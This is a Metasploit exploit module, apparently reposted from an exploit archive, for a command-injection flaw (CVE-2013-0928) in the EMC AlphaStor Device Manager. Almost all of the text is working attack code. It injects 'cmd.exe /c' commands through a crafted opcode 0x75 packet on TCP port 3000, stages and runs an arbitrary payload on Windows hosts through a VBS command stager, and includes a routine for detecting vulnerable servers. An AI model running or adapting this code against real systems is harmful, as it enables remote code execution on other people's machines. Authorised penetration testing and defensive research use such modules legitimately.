EMC AlphaStor Device Manager Opcode 0x75 Command Injection

2014-09-24 01:05:06

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
'Description' => %q{
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
command, the process does not properly filter user supplied input allowing for arbitrary
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
with Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
'Mohsan Farid <faridms[at]gmail.com>', # msf module
'Brent Morris <inkrypto[at]gmail.com>', # msf module
'juan vazquez' # convert aux module into exploit
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0928'],
['ZDI', '13-033']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Targets' =>
[
[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 18 2013'))

register_options(
[
Opt::RPORT(3000)
], self.class )
end

def check
packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
res = send_packet(packet)
if res && res =~ /Could not fork command/
return Exploit::CheckCode::Detected
end

Exploit::CheckCode::Unknown
end

def exploit
execute_cmdstager({ :linemax => 487 })
end

def execute_command(cmd, opts)
padding = rand_text_alpha_upper(489 - cmd.length)
packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
connect
sock.put(packet)
begin
sock.get_once
rescue EOFError
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
end
disconnect
end

def execute_cmdstager_begin(opts)
if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
cmd_list.each do |cmd|
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
end
end
end

def send_packet(packet)
connect

sock.put(packet)
begin
meta_data = sock.get_once(8)
rescue EOFError
meta_data = nil
end

unless meta_data
disconnect
return nil
end

code, length = meta_data.unpack("N*")

unless code == 1
disconnect
return nil
end

begin
data = sock.get_once(length)
rescue EOFError
data = nil
ensure
disconnect
end

data
end

end

Fixes

No fixes

In order to submit a new fix you need to be registered.